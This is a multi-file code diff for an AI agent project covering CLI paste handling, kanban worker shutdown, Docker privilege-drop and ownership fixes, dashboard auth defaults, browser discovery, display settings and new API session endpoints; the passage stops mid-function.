@@ -11770,6 +11902,15 @@ class HermesCLI:
set_secret_capture_callback(None)
except Exception:
pass
# Release the per-turn approval session key. ``_session_yolo``
# state itself is preserved across turns (so /yolo persists
# for the whole CLI run); we just unbind the contextvar so a
# reused thread doesn't see stale identity on its next run.
if _approval_session_token is not None and reset_current_session_key is not None:
try:
reset_current_session_key(_approval_session_token)
except Exception:
pass
# Start agent in background thread (daemon so it cannot keep the
# process alive when the user closes the terminal tab — SIGHUP
@@ -11900,6 +12041,7 @@ class HermesCLI:
and getattr(self.agent, "session_id", None)
and self.agent.session_id != self.session_id
):
self._transfer_session_yolo(self.session_id, self.agent.session_id)
self.session_id = self.agent.session_id
self._pending_title = None
@@ -13352,7 +13494,10 @@ class HermesCLI:
line_count = pasted_text.count('\n')
buf = event.current_buffer
threshold = self.config.get("paste_collapse_threshold", 5)
if threshold > 0 and line_count >= threshold and not buf.text.strip().startswith('/'):
char_threshold = self.config.get("paste_collapse_char_threshold", 2000)
lines_hit = threshold > 0 and line_count >= threshold
chars_hit = char_threshold > 0 and len(pasted_text) >= char_threshold
if (lines_hit or chars_hit) and not buf.text.strip().startswith('/'):
_paste_counter[0] += 1
paste_dir = _hermes_home / "pastes"
paste_dir.mkdir(parents=True, exist_ok=True)
@@ -13521,8 +13666,11 @@ class HermesCLI:
newlines_added = line_count - _prev_newline_count[0]
_prev_newline_count[0] = line_count
is_paste = chars_added > 1 or newlines_added >= 4
threshold = self.config.get("paste_collapse_threshold_fallback", 0)
if threshold > 0 and line_count >= threshold and is_paste and not text.startswith('/'):
threshold = self.config.get("paste_collapse_threshold_fallback", 5)
char_threshold = self.config.get("paste_collapse_char_threshold", 2000)
lines_hit = threshold > 0 and line_count >= threshold
chars_hit = char_threshold > 0 and len(text) >= char_threshold
if (lines_hit or chars_hit) and is_paste and not text.startswith('/'):
_paste_counter[0] += 1
paste_dir = _hermes_home / "pastes"
paste_dir.mkdir(parents=True, exist_ok=True)
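The two paste hunks above share one decision: collapse when either the line threshold or the character threshold is reached, unless the buffer holds a slash command. A minimal sketch of that predicate as a standalone function follows. The function name `should_collapse_paste` and its parameters are hypothetical; the defaults of 5 lines and 2000 characters are the ones shown in the diff.

```python
def should_collapse_paste(pasted_text, buffer_text="",
                          line_threshold=5, char_threshold=2000):
    """Return True when a paste is long enough, by lines or characters, to collapse."""
    line_count = pasted_text.count("\n")
    # A threshold of 0 (or less) disables that particular check.
    lines_hit = line_threshold > 0 and line_count >= line_threshold
    chars_hit = char_threshold > 0 and len(pasted_text) >= char_threshold
    # Slash commands are never collapsed, matching the startswith('/') guard.
    return (lines_hit or chars_hit) and not buffer_text.strip().startswith("/")
```

With this shape, a single very long line (for example a minified JSON blob) is collapsed even though it contains no newlines, which the line-count check alone would miss.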
@@ -14934,6 +15082,39 @@ def main(
time.sleep(_grace)
except Exception:
pass # never block signal handling
# Kanban worker exit path (#28181): SIGTERM hits a dispatcher-spawned
# worker that's likely in a non-daemon thread waiting on a child
# subprocess in _wait_for_process. Raising KeyboardInterrupt only
# unwinds the main thread; the worker thread keeps running, the
# process gets reparented to init, and the dispatcher's _pid_alive
# check returns True forever — task stuck in 'running' indefinitely.
# Skip the controlled-unwind dance and call os._exit(0) so the kernel
# reclaims the PID immediately and detect_crashed_workers can reclaim
# the stale claim on the next tick. Flush logging + stdout/stderr
# first so the final debug trace isn't lost; SIGALRM deadman guards
# the flush against any rare blocking-I/O case (the reporter measured
# flush in <1ms; the alarm is a failsafe, not the common path).
if os.environ.get("HERMES_KANBAN_TASK"):
try:
import signal as _sig_mod
if hasattr(_sig_mod, "SIGALRM"):
# Arm a 2-second deadman. alarm() replaces any pre-existing alarm,
# so this does not collide with caller-installed timers.
_sig_mod.signal(_sig_mod.SIGALRM, lambda *_: os._exit(0))
_sig_mod.alarm(2)
except Exception:
pass
try:
import logging as _lg
_lg.shutdown()
except Exception:
pass
for _stream in (sys.stdout, sys.stderr):
try:
_stream.flush()
except Exception:
pass
os._exit(0)
raise KeyboardInterrupt()
try:
import signal as _signal
@@ -14946,13 +15127,50 @@ def main(
# Handle single query mode
if query or image:
query, single_query_images = _collect_query_images(query, image)
# Kanban workers spawn with ``hermes chat -q "work kanban task <id>"``;
# the actual task description lives in the task body. Mirror the
# gateway/CLI behaviour for inbound images by scanning the body for
# local image paths and http(s) image URLs and attaching them to the
# worker's first turn. Without this, users who paste a screenshot
# path or URL into a kanban task body never get it routed to the
# model's vision input.
single_query_image_urls: list[str] = []
_kanban_task_id = os.environ.get("HERMES_KANBAN_TASK", "").strip()
if _kanban_task_id:
try:
from hermes_cli import kanban_db as _kb
from agent.image_routing import extract_image_refs as _extract_refs
_conn = _kb.connect()
try:
_task = _kb.get_task(_conn, _kanban_task_id)
finally:
try:
_conn.close()
except Exception:
pass
_body = getattr(_task, "body", "") if _task is not None else ""
if _body:
_kb_paths, _kb_urls = _extract_refs(_body)
if _kb_paths:
# Dedupe against any --image the user already passed.
_seen = {str(p) for p in single_query_images}
for _p in _kb_paths:
if _p not in _seen:
_seen.add(_p)
single_query_images.append(Path(_p))
if _kb_urls:
single_query_image_urls.extend(_kb_urls)
except Exception as _exc:
# Best-effort enrichment; never block worker startup on it.
logger.debug("kanban image-ref extraction failed: %s", _exc)
if quiet:
# Quiet mode: suppress banner, spinner, tool previews.
# Only print the final response and parseable session info.
cli.tool_progress_mode = "off"
if cli._ensure_runtime_credentials():
effective_query: Any = query
if single_query_images:
if single_query_images or single_query_image_urls:
# Honour the same image-routing decision used by the
# interactive path. With a vision-capable model (incl.
# custom-provider models declared via
@@ -14981,19 +15199,26 @@ def main(
_parts, _skipped = _build_parts(
query if isinstance(query, str) else "",
[str(p) for p in single_query_images],
image_urls=list(single_query_image_urls) or None,
)
if any(p.get("type") == "image_url" for p in _parts):
effective_query = _parts
else:
# All images unreadable — text fallback.
# ``_preprocess_images_with_vision`` only knows
# about local files; URLs would be lost there,
# so keep the original query text intact when
# only URLs were supplied.
if single_query_images:
effective_query = cli._preprocess_images_with_vision(
query, single_query_images, announce=False,
)
except Exception:
if single_query_images:
effective_query = cli._preprocess_images_with_vision(
query, single_query_images, announce=False,
)
except Exception:
effective_query = cli._preprocess_images_with_vision(
query, single_query_images, announce=False,
)
else:
elif single_query_images:
effective_query = cli._preprocess_images_with_vision(
query,
single_query_images,
+38
@@ -0,0 +1,38 @@
#
# docker-compose.windows.yml — Windows Docker Desktop compatible
#
# Differences from docker-compose.yml:
# - Removes `network_mode: host` (not supported on Docker Desktop for Windows)
# - Uses explicit port mappings instead
# - Uses Windows-style volume path for ~/.hermes
#
# Usage:
# docker compose -f docker-compose.windows.yml up -d
#
services:
gateway:
image: nousresearch/hermes-agent:latest
container_name: hermes
restart: unless-stopped
volumes:
- ${USERPROFILE}/.hermes:/opt/data
environment:
- HERMES_UID=10000
- HERMES_GID=10000
command: ["gateway", "run"]
dashboard:
image: nousresearch/hermes-agent:latest
container_name: hermes-dashboard
restart: unless-stopped
depends_on:
- gateway
volumes:
- ${USERPROFILE}/.hermes:/opt/data
environment:
- HERMES_UID=10000
- HERMES_GID=10000
- HERMES_DASHBOARD_HOST=0.0.0.0
ports:
- "127.0.0.1:9119:9119"
command: ["dashboard", "--host", "0.0.0.0", "--port", "9119", "--no-open", "--insecure"]
+87
@@ -0,0 +1,87 @@
#!/bin/sh
# shellcheck shell=sh
# /opt/hermes/bin/hermes — `docker exec` privilege-drop shim.
#
# Background
# ----------
# The s6 image runs the supervised gateway/main process as the unprivileged
# `hermes` user (UID 10000). When an operator runs `docker exec <c> hermes ...`
# the default UID is root (0), and any file the command writes under
# $HERMES_HOME — auth.json, .env, config.yaml — ends up root-owned and
# unreadable to the supervised gateway. The most common manifestation: the
# user runs `docker exec <c> hermes login`, this writes
# /opt/data/auth.json as root:root mode 0600, and from then on the gateway
# returns "Provider authentication failed: Hermes is not logged into Nous
# Portal" on every incoming message — even though `docker exec <c> hermes
# chat -q ping` (also running as root) succeeds because root happens to be
# able to read its own root-owned file. See systematic-debugging skill
# notes attached to this fix.
#
# Fix
# ---
# This shim sits at /opt/hermes/bin/hermes and is placed earliest on PATH.
# When invoked as root, it drops to the hermes user (via s6-setuidgid)
# before exec'ing the real venv binary, so anything that writes under
# $HERMES_HOME is uid-aligned with the supervised processes. When invoked
# as any non-root UID — including the supervised processes themselves,
# `docker exec --user hermes`, kanban subagents, etc. — it short-circuits
# straight to the venv binary with no privilege change. Net: one extra
# fork on the docker-exec-as-root path, zero behavioral change on every
# other path.
#
# Recursion safety: the shim exec's the venv binary by *absolute path*
# (/opt/hermes/.venv/bin/hermes), so the second hop cannot re-enter this
# shim regardless of PATH state. No sentinel env var needed.
#
# Opt-out: set HERMES_DOCKER_EXEC_AS_ROOT=1 (1/true/yes in lower, upper, or title case)
# to keep running as root. Reserved for diagnostic sessions where the
# operator deliberately wants root semantics — e.g. inspecting root-only
# state via the hermes CLI. Default is to drop.
set -e
REAL=/opt/hermes/.venv/bin/hermes
# Defensive: if the venv binary is missing (corrupted image, partial
# install), fail loudly rather than silently masking it.
if [ ! -x "$REAL" ]; then
echo "hermes-shim: $REAL not found or not executable" >&2
exit 127
fi
# Already non-root? Just exec the real binary. This is the hot path for
# supervised processes (uid 10000) and for `docker exec --user hermes`.
if [ "$(id -u)" != "0" ]; then
exec "$REAL" "$@"
fi
# Root, with opt-out set? Honor it.
case "${HERMES_DOCKER_EXEC_AS_ROOT:-}" in
1|true|TRUE|True|yes|YES|Yes)
exec "$REAL" "$@"
;;
esac
# Root, no opt-out. Drop to the hermes user.
#
# s6-setuidgid lives under /command/ which is NOT on `docker exec`'s PATH
# (s6-overlay only puts /command/ on PATH for supervision-tree children).
# Reference it by absolute path so the drop is robust against PATH
# manipulation.
S6_SUID=/command/s6-setuidgid
if [ ! -x "$S6_SUID" ]; then
# Non-s6 image (someone stripped s6-overlay, or a hand-built variant).
# Fail loud rather than silently re-execing as root and leaking the
# bug this shim exists to prevent.
echo "hermes-shim: $S6_SUID not found; refusing to silently run as root." >&2
echo "hermes-shim: re-run with --user hermes or set HERMES_DOCKER_EXEC_AS_ROOT=1." >&2
exit 126
fi
# Reset HOME to the hermes user's home before dropping privileges. Without
# this, $HOME stays /root and any library that resolves paths off $HOME
# (XDG caches, lockfiles, .config writes) will try to write to /root and
# fail with EACCES. Mirrors main-wrapper.sh.
export HOME=/opt/data
exec "$S6_SUID" hermes "$REAL" "$@"
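The branch order of the shim above can be summarised as a pure function. This is a sketch in Python for illustration only: `shim_action` and `OPT_OUT_VALUES` are hypothetical names, and the returned labels simply describe which branch the shell script would take.

```python
# The exact spellings accepted by the shim's `case` statement.
OPT_OUT_VALUES = {"1", "true", "TRUE", "True", "yes", "YES", "Yes"}


def shim_action(uid, opt_out="", real_exists=True, s6_exists=True):
    """Return a short label for the branch the shim would take."""
    if not real_exists:
        return "exit 127"        # venv binary missing or not executable
    if uid != 0:
        return "exec real"       # already unprivileged: no privilege change
    if opt_out in OPT_OUT_VALUES:
        return "exec real"       # operator explicitly asked to stay root
    if not s6_exists:
        return "exit 126"        # refuse to run as root silently
    return "drop to hermes"      # s6-setuidgid hermes <real binary> ...
```

Note that the match is on a fixed list of spellings, so a mixed-case value such as `tRuE` does not opt out and the shim still drops privileges.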
+14 -1
@@ -1,9 +1,16 @@
#!/bin/sh
#!/command/with-contenv sh
# shellcheck shell=sh
# /opt/hermes/docker/main-wrapper.sh — wraps the container's CMD with
# the same argument-routing logic the pre-s6 entrypoint.sh used. Runs
# as /init's "main program" (Docker CMD) so it inherits stdin/stdout/
# stderr from the container.
#
# Shebang note: /init scrubs env before invoking CMD, so a plain
# `#!/bin/sh` wrapper sees an empty environ and `ENV HERMES_HOME=/opt/data`
# from the Dockerfile never reaches `hermes`. with-contenv repopulates
# the env from /run/s6/container_environment before exec'ing, which is
# what s6-supervised services use too (see main-hermes/run).
#
# Routing:
# no args → exec `hermes` (the default)
# first arg is an executable → exec it directly (sleep, bash, sh, …)
@@ -13,6 +20,12 @@
# workload runs unprivileged (UID 10000 by default).
set -e
# HOME comes through with-contenv as /root (the /init context). Override
# to the hermes user's home before dropping privileges so libraries that
# resolve paths via $HOME (e.g. discord lockfile under XDG_STATE_HOME)
# don't try to write to /root.
export HOME=/opt/data
cd /opt/data
# shellcheck disable=SC1091
. /opt/hermes/.venv/bin/activate
+18 -6
@@ -19,6 +19,10 @@ case "${HERMES_DASHBOARD:-}" in
;;
esac
# with-contenv repopulates HOME from /init as /root. Reset it before
# dropping privileges so HOME-anchored state lands under /opt/data.
export HOME=/opt/data
cd /opt/data
# shellcheck disable=SC1091
. /opt/hermes/.venv/bin/activate
@@ -26,13 +30,21 @@ cd /opt/data
dash_host="${HERMES_DASHBOARD_HOST:-0.0.0.0}"
dash_port="${HERMES_DASHBOARD_PORT:-9119}"
# Binding to anything other than localhost requires --insecure — the
# dashboard refuses otherwise because it exposes API keys. Inside a
# container this is the expected deployment.
# `--insecure` is opt-in via HERMES_DASHBOARD_INSECURE. The dashboard's
# OAuth auth gate engages automatically on non-loopback binds when a
# DashboardAuthProvider is registered (e.g. the bundled dashboard_auth/nous
# provider, which auto-registers when HERMES_DASHBOARD_OAUTH_CLIENT_ID is
# set). If no provider is registered, start_server fails closed with a
# specific operator-facing error.
#
# This used to derive --insecure from the bind host ("anything non-loopback
# implies insecure"), but that predates the OAuth gate and silently
# disabled it on every container-deployed dashboard. The gate is now the
# authority; operators on trusted LANs / behind a reverse proxy without
# the OAuth contract opt in explicitly.
insecure=""
case "$dash_host" in
127.0.0.1|localhost) ;;
*) insecure="--insecure" ;;
case "${HERMES_DASHBOARD_INSECURE:-}" in
1|true|TRUE|True|yes|YES|Yes) insecure="--insecure" ;;
esac
# shellcheck disable=SC2086 # word-splitting of $insecure is intentional
+99 -7
@@ -20,6 +20,18 @@ set -eu
HERMES_HOME="${HERMES_HOME:-/opt/data}"
INSTALL_DIR="/opt/hermes"
# --- Bootstrap HERMES_HOME as root ---
# Create the directory (and any missing parents) while we still have root
# privileges so the chown checks below see real metadata and the later
# `s6-setuidgid hermes mkdir -p` block doesn't EACCES on root-owned
# ancestors. Without this, custom HERMES_HOME paths whose parents only
# root can create (e.g. `HERMES_HOME=/home/hermes/.hermes` in a Compose
# file, or any path under a fresh / not pre-populated by the image)
# fail on first boot with `mkdir: cannot create directory '/...': Permission
# denied` and the cont-init hook exits non-zero. Idempotent — `mkdir -p`
# is a no-op if the dir already exists. (#18482, salvages #18488)
mkdir -p "$HERMES_HOME"
# --- UID/GID remap ---
if [ -n "${HERMES_UID:-}" ] && [ "$HERMES_UID" != "$(id -u hermes)" ]; then
echo "[stage2] Changing hermes UID to $HERMES_UID"
@@ -33,6 +45,14 @@ if [ -n "${HERMES_GID:-}" ] && [ "$HERMES_GID" != "$(id -g hermes)" ]; then
fi
# --- Fix ownership of data volume ---
# When HERMES_UID is remapped or the top-level $HERMES_HOME isn't owned by
# the runtime hermes UID, restore ownership to hermes — but ONLY for the
# directories hermes actually writes to. The full $HERMES_HOME may be a
# host-mounted bind containing unrelated user files; `chown -R` would
# silently destroy host ownership of those (see issue #19788).
#
# The canonical list of hermes-owned subdirs is the same one the s6-setuidgid
# mkdir -p block below seeds. Keep them in sync if the seed list changes.
actual_hermes_uid=$(id -u hermes)
needs_chown=false
if [ -n "${HERMES_UID:-}" ] && [ "$HERMES_UID" != "10000" ]; then
@@ -41,16 +61,45 @@ elif [ "$(stat -c %u "$HERMES_HOME" 2>/dev/null)" != "$actual_hermes_uid" ]; the
needs_chown=true
fi
if [ "$needs_chown" = true ]; then
echo "[stage2] Fixing ownership of $HERMES_HOME to hermes ($actual_hermes_uid)"
echo "[stage2] Fixing ownership of $HERMES_HOME (targeted) to hermes ($actual_hermes_uid)"
# In rootless Podman the container's "root" is mapped to an
# unprivileged host UID — chown will fail. That's fine: the volume
# is already owned by the mapped user on the host side.
chown -R hermes:hermes "$HERMES_HOME" 2>/dev/null || \
echo "[stage2] Warning: chown failed (rootless container?) — continuing"
# The .venv must also be re-chowned when UID is remapped, otherwise
# lazy_deps.py cannot install platform packages (discord.py, etc.).
chown -R hermes:hermes "$INSTALL_DIR/.venv" 2>/dev/null || \
echo "[stage2] Warning: chown .venv failed (rootless container?) — continuing"
#
# Top-level $HERMES_HOME: chown the directory itself (not its contents)
# so hermes can mkdir new subdirs but bind-mounted host files keep
# their existing ownership.
chown hermes:hermes "$HERMES_HOME" 2>/dev/null || \
echo "[stage2] Warning: chown $HERMES_HOME failed (rootless container?) — continuing"
# Hermes-owned subdirs: recursive chown is safe here because these are
# created and managed exclusively by hermes (see the s6-setuidgid mkdir
# -p block below for the canonical list).
for sub in cron sessions logs hooks memories skills skins plans workspace home profiles; do
if [ -e "$HERMES_HOME/$sub" ]; then
chown -R hermes:hermes "$HERMES_HOME/$sub" 2>/dev/null || \
echo "[stage2] Warning: chown $HERMES_HOME/$sub failed (rootless container?) — continuing"
fi
done
# Hermes-owned trees under $INSTALL_DIR must be re-chowned when the UID
# is remapped — otherwise:
# - .venv: lazy_deps.py cannot install platform packages (discord.py,
# telegram, slack, etc.) with EACCES (#15012, #21100)
# - ui-tui: esbuild rebuilds dist/entry.js on every TUI launch (when
# the source mtime is newer than dist/ or when HERMES_TUI_FORCE_BUILD
# is set) and writes to ui-tui/dist/. Without this chown the new
# hermes UID can't write the build output (#28851).
# - node_modules: root-level dependencies (puppeteer, web tooling)
# that runtime code may walk/update.
# The set mirrors the build-time `chown -R hermes:hermes` line in the
# Dockerfile — keep them in sync if the Dockerfile chown set changes.
# These are under $INSTALL_DIR (not $HERMES_HOME), so the bind-mount
# concern doesn't apply — recursive is fine.
chown -R hermes:hermes \
"$INSTALL_DIR/.venv" \
"$INSTALL_DIR/ui-tui" \
"$INSTALL_DIR/node_modules" \
2>/dev/null || \
echo "[stage2] Warning: chown of build trees failed (rootless container?) — continuing"
fi
# Always reset ownership of $HERMES_HOME/profiles to hermes on every
@@ -139,4 +188,47 @@ if [ -d "$INSTALL_DIR/skills" ]; then
|| echo "[stage2] Warning: skills_sync.py failed; continuing"
fi
# --- Discover agent-browser's Chromium binary ---
# The image's Dockerfile runs `npx playwright install chromium`, which
# populates ``$PLAYWRIGHT_BROWSERS_PATH`` (=/opt/hermes/.playwright) with
# a ``chromium_headless_shell-<build>/chrome-headless-shell-linux64/``
# directory. agent-browser (the runtime CLI Hermes spawns for the
# browser tool) doesn't recognise this layout in its own cache scan and
# fails with "Auto-launch failed: Chrome not found" — even though the
# binary is right there (#15697).
#
# Fix: locate the binary at boot and export ``AGENT_BROWSER_EXECUTABLE_PATH``
# via /run/s6/container_environment so the `with-contenv` shebang on
# main-wrapper.sh propagates it into the supervised ``hermes`` process
# and thence to agent-browser subprocesses.
#
# - Skipped when the user has already set ``AGENT_BROWSER_EXECUTABLE_PATH``
# (lets users override with a system Chrome install).
# - Filename-matched (not path-matched): the chromium dir contains many
# shared libraries (libGLESv2.so, libEGL.so, ...) which inherit the
# executable bit from Playwright's tarball but are NOT browser binaries.
# We only accept files whose basename is chrome / chromium /
# chrome-headless-shell / chromium-browser. Compare PR #18635's earlier
# ``find | grep -Ei 'chrome|chromium'`` which would match the path
# ``.../chrome-headless-shell-linux64/libGLESv2.so`` and pick a .so.
# - Quietly skipped when $PLAYWRIGHT_BROWSERS_PATH doesn't exist (e.g.
# custom builds that strip Playwright).
if [ -z "${AGENT_BROWSER_EXECUTABLE_PATH:-}" ] && \
[ -n "${PLAYWRIGHT_BROWSERS_PATH:-}" ] && \
[ -d "$PLAYWRIGHT_BROWSERS_PATH" ]; then
browser_bin=$(find "$PLAYWRIGHT_BROWSERS_PATH" -type f -executable \
\( -name 'chrome' -o -name 'chromium' \
-o -name 'chrome-headless-shell' -o -name 'chromium-browser' \) \
2>/dev/null | head -n 1)
if [ -n "$browser_bin" ]; then
echo "[stage2] Found agent-browser Chromium binary: $browser_bin"
# Write to s6's container_environment so with-contenv picks it
# up for all supervised services (main-hermes, dashboard, etc.).
# Idempotent: each boot overwrites with the current path.
printf '%s' "$browser_bin" > /run/s6/container_environment/AGENT_BROWSER_EXECUTABLE_PATH
else
echo "[stage2] Warning: no Chromium binary under $PLAYWRIGHT_BROWSERS_PATH; browser tool may fail"
fi
fi
echo "[stage2] Setup complete; starting user services"
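The filename-matched discovery described above (accept only files whose basename is a known browser name, so that executable shared libraries inside a `chrome-...` directory are not picked) can be sketched in Python. This is an illustration of the matching rule, not the boot script itself; `find_browser_binary` and `BROWSER_BASENAMES` are hypothetical names, and the traversal order may differ from `find | head -n 1`.

```python
import os

# Basenames accepted by the `find ... -name` expression in the script.
BROWSER_BASENAMES = {
    "chrome", "chromium", "chrome-headless-shell", "chromium-browser",
}


def find_browser_binary(root):
    """Return the first executable regular file under root with a browser basename."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            if name not in BROWSER_BASENAMES:
                # e.g. libGLESv2.so inside chrome-headless-shell-linux64/
                continue
            path = os.path.join(dirpath, name)
            is_regular = os.path.isfile(path) and not os.path.islink(path)
            if is_regular and os.access(path, os.X_OK):
                return path
    return None
```

Matching on the basename rather than the full path is what rules out `.../chrome-headless-shell-linux64/libGLESv2.so`, whose path contains `chrome` but whose filename does not.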
+37 -3
@@ -35,7 +35,12 @@ _GLOBAL_DEFAULTS: dict[str, Any] = {
"show_reasoning": False,
"tool_preview_length": 0,
"streaming": None, # None = follow top-level streaming config
# When true, delete tool-progress / "Still working..." / status bubbles
# Gateway-only assistant/status chatter controls. These default on for
# back-compat, but mobile platforms can opt down to final-answer-first.
"interim_assistant_messages": True,
"long_running_notifications": True,
"busy_ack_detail": True,
# When true, delete tool-progress / "⏳ Working — N min" / status bubbles
# after the final response lands on platforms that support message
# deletion (e.g. Telegram). Off by default — progress is still shown
# live, just cleaned up after success so the chat doesn't fill up with
@@ -56,6 +61,9 @@ _TIER_HIGH = {
"show_reasoning": False,
"tool_preview_length": 40,
"streaming": None, # follow global
"interim_assistant_messages": True,
"long_running_notifications": True,
"busy_ack_detail": True,
}
_TIER_MEDIUM = {
@@ -63,6 +71,9 @@ _TIER_MEDIUM = {
"show_reasoning": False,
"tool_preview_length": 40,
"streaming": None,
"interim_assistant_messages": True,
"long_running_notifications": True,
"busy_ack_detail": True,
}
_TIER_LOW = {
@@ -70,6 +81,9 @@ _TIER_LOW = {
"show_reasoning": False,
"tool_preview_length": 40,
"streaming": False,
"interim_assistant_messages": False,
"long_running_notifications": False,
"busy_ack_detail": False,
}
_TIER_MINIMAL = {
@@ -77,11 +91,25 @@ _TIER_MINIMAL = {
"show_reasoning": False,
"tool_preview_length": 0,
"streaming": False,
"interim_assistant_messages": False,
"long_running_notifications": False,
"busy_ack_detail": False,
}
_PLATFORM_DEFAULTS: dict[str, dict[str, Any]] = {
# Tier 1 — full edit support, personal/team use
"telegram": {**_TIER_HIGH, "tool_progress": "new"},
# Telegram is usually a mobile inbox: keep tool_progress quiet and skip
# the verbose busy-ack iteration counter, but DO surface real mid-turn
# assistant commentary (interim_assistant_messages) and DO send periodic
# heartbeats (long_running_notifications) so the user has signal between
# turn start and final answer. Otherwise it looks like "typing..." for
# 30 minutes with nothing happening. Opt in to verbose iteration detail
# via display.platforms.telegram.busy_ack_detail / tool_progress.
"telegram": {
**_TIER_HIGH,
"tool_progress": "off",
"busy_ack_detail": False,
},
"discord": _TIER_HIGH,
# Tier 2 — edit support, often customer/workspace channels
@@ -190,7 +218,13 @@ def _normalise(setting: str, value: Any) -> Any:
if value is True:
return "all"
return str(value).lower()
if setting in {"show_reasoning", "streaming"}:
if setting in {
"show_reasoning",
"streaming",
"interim_assistant_messages",
"long_running_notifications",
"busy_ack_detail",
}:
if isinstance(value, str):
return value.lower() in {"true", "1", "yes", "on"}
return bool(value)
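The display-config changes above combine two small techniques: a platform entry that overrides selected keys of a shared tier via dict unpacking, and a boolean coercion for string-valued settings. A minimal sketch follows, assuming a trimmed-down tier that holds only the keys visible in the diff. `TIER_HIGH`, `TELEGRAM_DEFAULTS`, and `normalise_bool` are hypothetical names for illustration.

```python
# Trimmed-down stand-in for the high tier; only keys shown in the diff.
TIER_HIGH = {
    "show_reasoning": False,
    "tool_preview_length": 40,
    "interim_assistant_messages": True,
    "long_running_notifications": True,
    "busy_ack_detail": True,
}

# Later keys win, so the platform entry overrides the tier without mutating it.
TELEGRAM_DEFAULTS = {
    **TIER_HIGH,
    "tool_progress": "off",
    "busy_ack_detail": False,
}

TRUTHY_STRINGS = {"true", "1", "yes", "on"}


def normalise_bool(value):
    """Coerce a config value to bool; strings are compared case-insensitively."""
    if isinstance(value, str):
        return value.lower() in TRUTHY_STRINGS
    return bool(value)
```

Any string outside the truthy set, including `"off"` and `"no"`, coerces to `False`, so a YAML value quoted by mistake still behaves as the operator intended.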
+591 -17
@@ -8,6 +8,12 @@ Exposes an HTTP server with endpoints:
- DELETE /v1/responses/{response_id} Delete a stored response
- GET /v1/models lists hermes-agent as an available model
- GET /v1/capabilities machine-readable API capabilities for external UIs
- GET /api/sessions list client-visible Hermes sessions
- POST /api/sessions create an empty Hermes session
- GET/PATCH/DELETE /api/sessions/{session_id} read/update/delete a session
- GET /api/sessions/{session_id}/messages read session message history
- POST /api/sessions/{session_id}/fork branch a session using SessionDB lineage
- POST /api/sessions/{session_id}/chat[/stream] chat with a persisted session
- POST /v1/runs start a run, returns run_id immediately (202)
- GET /v1/runs/{run_id} retrieve current run status
- GET /v1/runs/{run_id}/events SSE stream of structured lifecycle events
@@ -18,7 +24,8 @@ Exposes an HTTP server with endpoints:
Any OpenAI-compatible frontend (Open WebUI, LobeChat, LibreChat,
AnythingLLM, NextChat, ChatBox, etc.) can connect to hermes-agent
through this adapter by pointing at http://localhost:8642/v1.
through this adapter by pointing at http://localhost:8642/v1 and
authenticating with API_SERVER_KEY.
Requires:
- aiohttp (already available in the gateway)
@@ -313,6 +320,20 @@ def _multimodal_validation_error(exc: ValueError, *, param: str) -> "web.Respons
)
def _session_chat_user_message(body: Dict[str, Any], *, param: str = "message") -> tuple[Any, Optional["web.Response"]]:
"""Parse and normalize session chat ``message`` / ``input`` like chat completions."""
user_message = body.get("message") or body.get("input")
if not _content_has_visible_payload(user_message):
return None, web.json_response(
_openai_error("Missing 'message' field", code="missing_message"),
status=400,
)
try:
return _normalize_multimodal_content(user_message), None
except ValueError as exc:
return None, _multimodal_validation_error(exc, param=param)
def check_api_server_requirements() -> bool:
"""Check if API server dependencies are available."""
return AIOHTTP_AVAILABLE
@@ -824,11 +845,11 @@ class APIServerAdapter(BasePlatformAdapter):
Validate Bearer token from Authorization header.
Returns None if auth is OK, or a 401 web.Response on failure.
If no API key is configured, all requests are allowed (only when API
server is local).
connect() refuses to start the API server without API_SERVER_KEY, so
the no-key branch only exists for tests or unsupported manual wiring.
"""
if not self._api_key:
return None # No key configured — allow all (local-only use)
return None
auth_header = request.headers.get("Authorization", "")
if auth_header.startswith("Bearer "):
@@ -1086,6 +1107,16 @@ class APIServerAdapter(BasePlatformAdapter):
"run_approval_response": True,
"tool_progress_events": True,
"approval_events": True,
"session_resources": True,
"session_chat": True,
"session_chat_streaming": True,
"session_fork": True,
"admin_config_rw": False,
"jobs_admin": False,
"memory_write_api": False,
"skills_api": True,
"audio_api": False,
"realtime_voice": False,
"session_continuity_header": "X-Hermes-Session-Id",
"session_key_header": "X-Hermes-Session-Key",
"cors": bool(self._cors_origins),
@@ -1101,9 +1132,540 @@ class APIServerAdapter(BasePlatformAdapter):
"run_events": {"method": "GET", "path": "/v1/runs/{run_id}/events"},
"run_approval": {"method": "POST", "path": "/v1/runs/{run_id}/approval"},
"run_stop": {"method": "POST", "path": "/v1/runs/{run_id}/stop"},
"skills": {"method": "GET", "path": "/v1/skills"},
"toolsets": {"method": "GET", "path": "/v1/toolsets"},
"sessions": {"method": "GET", "path": "/api/sessions"},
"session_create": {"method": "POST", "path": "/api/sessions"},
"session": {"method": "GET", "path": "/api/sessions/{session_id}"},
"session_update": {"method": "PATCH", "path": "/api/sessions/{session_id}"},
"session_delete": {"method": "DELETE", "path": "/api/sessions/{session_id}"},
"session_messages": {"method": "GET", "path": "/api/sessions/{session_id}/messages"},
"session_fork": {"method": "POST", "path": "/api/sessions/{session_id}/fork"},
"session_chat": {"method": "POST", "path": "/api/sessions/{session_id}/chat"},
"session_chat_stream": {"method": "POST", "path": "/api/sessions/{session_id}/chat/stream"},
},
})
async def _handle_skills(self, request: "web.Request") -> "web.Response":
"""GET /v1/skills — list installed skills visible to the API-server agent.
Read-only listing intended for external clients that need to know
which skills are available without sending a chat message and asking
the model. Mirrors what the gateway/CLI surfaces through
``/skills list``, but as a deterministic JSON payload.
Returns the same skill metadata (name, description, category) the
skills hub uses internally. Disabled skills are excluded so the
listing matches what the agent actually loads.
"""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
try:
from tools.skills_tool import _find_all_skills, _sort_skills
skills = _sort_skills(_find_all_skills(skip_disabled=False))
except Exception:
logger.exception("GET /v1/skills failed")
return web.json_response(
_openai_error("Failed to enumerate skills", err_type="server_error"),
status=500,
)
return web.json_response({
"object": "list",
"data": skills,
})
async def _handle_toolsets(self, request: "web.Request") -> "web.Response":
"""GET /v1/toolsets — list toolsets and their resolved tools.
Returns the toolset surface the api_server platform actually exposes
to its agent: each toolset's enabled/configured state plus the
concrete tool names it expands to. This is the deterministic
equivalent of what a client would otherwise have to recover by
asking the model what tools it can call.
"""
auth_err = self._check_auth(request)
if auth_err:
return auth_err
try:
from hermes_cli.config import load_config
from hermes_cli.tools_config import (
_get_effective_configurable_toolsets,
_get_platform_tools,
_toolset_has_keys,
)
from toolsets import resolve_toolset
config = load_config()
enabled_toolsets = _get_platform_tools(
config,
"api_server",
include_default_mcp_servers=False,
